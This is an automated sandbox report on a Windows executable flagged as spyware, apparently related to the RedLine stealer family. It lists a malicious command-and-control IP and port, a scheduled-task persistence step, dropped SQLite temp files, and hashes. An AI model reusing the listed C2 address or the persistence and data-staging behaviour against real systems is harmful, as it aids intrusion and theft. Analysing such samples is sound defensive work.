                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.222.58.233:55615t-ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/actor/nextl2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.222.58.233
                      		unknownNetherlands
                      		51447ROOTLAYERNETNLtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1507398
                      Start date and time:2024-09-08 13:33:11 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 15s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:18
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:l2rMtmFkD6.exe
                      renamed because original name is a hash value
                      Original Sample Name:1bac686fac8c55f6824923fd43ca0d9e.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@21/107@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 106
                      • Number of non-executed functions: 9
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: l2rMtmFkD6.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      07:33:58API Interceptor37x Sleep call for process: l2rMtmFkD6.exe modified
                      07:34:04API Interceptor35x Sleep call for process: powershell.exe modified
                      07:34:07API Interceptor48x Sleep call for process: ECcZgk.exe modified
                      13:34:06Task SchedulerRun new task: ECcZgk path: C:\Users\user\AppData\Roaming\ECcZgk.exe

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ROOTLAYERNETNLHJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
                      • 185.222.58.113
                      PzPxqbK89H.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.239
                      tfF3UBTdr8.exeGet hashmaliciousRedLineBrowse
                      • 185.222.57.91
                      4Si6dGqcuy.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.102
                      lmec.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.171
                      CLgi.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.169
                      8XYOB9Lo1C.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                      • 45.137.22.179
                      5B8E6Z6ZdN.exeGet hashmaliciousRedLineBrowse
                      • 185.222.57.81
                      XAUnTZQny8.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                      • 45.137.22.253
                      Xf0VkRcuwx.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.164

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ECcZgk.exe.log

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1730
                      Entropy (8bit):5.35299682261553
                      Encrypted:false
                      SSDEEP:48:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectHo6THxvzHKnHKU57Uy:Pq5qHwCYqh3oPqMRZqzttI6TRrqnqU5t
                      MD5:72ACFA4398710193E4D916B3E0294A20
                      SHA1:9571ECD98BDBB49C903841C0955B22CD63B73399
                      SHA-256:86469D22464D5DF601E8307549ADAA2FCEE0F59BA0258F760D80427A893FDF4C
                      SHA-512:E0A3FDF07CC16E0862CDC19181F0DEC6521F92B8D56E49DDDF1F94AAC58779BCA047C28F4A609A796A2F02175C495CC4C227F9D9D54C6E81FD6F102BA696DBE9
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\l2rMtmFkD6.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1730
                      Entropy (8bit):5.35299682261553
                      Encrypted:false
                      SSDEEP:48:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectHo6THxvzHKnHKU57Uy:Pq5qHwCYqh3oPqMRZqzttI6TRrqnqU5t
                      MD5:72ACFA4398710193E4D916B3E0294A20
                      SHA1:9571ECD98BDBB49C903841C0955B22CD63B73399
                      SHA-256:86469D22464D5DF601E8307549ADAA2FCEE0F59BA0258F760D80427A893FDF4C
                      SHA-512:E0A3FDF07CC16E0862CDC19181F0DEC6521F92B8D56E49DDDF1F94AAC58779BCA047C28F4A609A796A2F02175C495CC4C227F9D9D54C6E81FD6F102BA696DBE9
                      Malicious:true
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2232
                      Entropy (8bit):5.380747059108785
                      Encrypted:false
                      SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                      MD5:4D3B8C97355CF67072ABECB12613F72B
                      SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                      SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                      SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                      Malicious:false
                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzb1rytn.tvw.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyvb4kol.0ns.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvvypv1n.grr.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knrvkp0w.nt0.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phiy0ts2.u0b.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3juixqg.tru.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfw2n3t4.ks0.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfg4gawp.em0.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\tmp156F.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp157F.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1590.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1591.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp15A2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp15B2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp15B3.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp15D4.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1BF6.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
